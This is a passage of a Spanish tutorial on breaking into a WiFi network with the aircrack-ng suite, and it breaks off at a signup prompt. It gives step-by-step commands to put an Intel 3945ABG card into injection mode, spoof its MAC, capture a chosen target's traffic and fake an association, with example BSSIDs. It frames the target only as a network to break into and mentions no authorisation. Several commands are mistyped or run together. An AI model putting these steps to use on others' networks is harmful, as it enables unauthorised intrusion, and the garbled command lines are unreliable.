Internert
lspci | grep Netowrk
Mostrándonos que efectivamente tenemos esa tarjeta
0c:00.0 Network controller:Intel Corporation PRO/Wireless 3945ABG Network Connection (rev02)
Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos comandos:
rmmodiwl3945
modprobe ipwraw
Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta, que será la que NO nos marque "no wireless extensions", que en mi casole llama wifi0:
iwconfig
Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a habilitar:
airmon-ng stop wifi down
ifconfig wifi0 downmacchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:
airodump-ng wifi0
Ya exploradas todas lasredes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID, ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de inyección depaquetes para romper su seguridad con este código:
airodump-ng -c (canal de transmisión, columna CH) -w (nombre del archivo de captura) --bssid (MAC del router de red destino que copiamos) wifi0
Lo quepara mi ejemplo quedó así:
airodump-ng -c 3 -w jafrancov --bssid 00:21:7C:D0:71:89 wifi0
Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router,si esta es correcta nos regresará una carita feliz como esta --> :-)
aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0
Para mi ejemplo:
aireplay-ng-1 0 -a 00:21:7C:D0:71:89 -h 00:11:22:33:44:55 wifi0
Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado "enter" nos preguntará si deseamos usar el...
Regístrate para leer el documento completo.